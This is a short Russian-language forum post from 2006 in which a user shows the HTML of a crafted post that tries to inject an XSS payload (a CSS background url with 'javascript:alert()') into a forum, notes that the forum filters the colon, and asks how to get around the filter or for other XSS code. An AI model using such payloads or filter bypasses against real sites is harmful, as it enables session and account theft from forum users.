10.01.2006, 21:10
|
|
Познающий
Регистрация: 29.07.2005
Сообщений: 35
Провел на форуме:
126493
Репутация:
3
|
|
Насколько я поял, дело здесь в том, что форум не пропускает двоеточие :
Вот код поста после отсылки его на форум ( Без звездочки)
Код HTML:
<div class="postcolor" style='padding:4px;'><a href='index.php?act=findpost&pid=1000<a href='index.php?showtopic=target style=background&*#58;url(java script:alert()); '> </a>'><br /><br /><br /></a></div>
Есть ли возможность обойти это, или подскажите какой нибудь другой код для XSS...
Последний раз редактировалось Astro; 10.01.2006 в 21:18..
|
|
|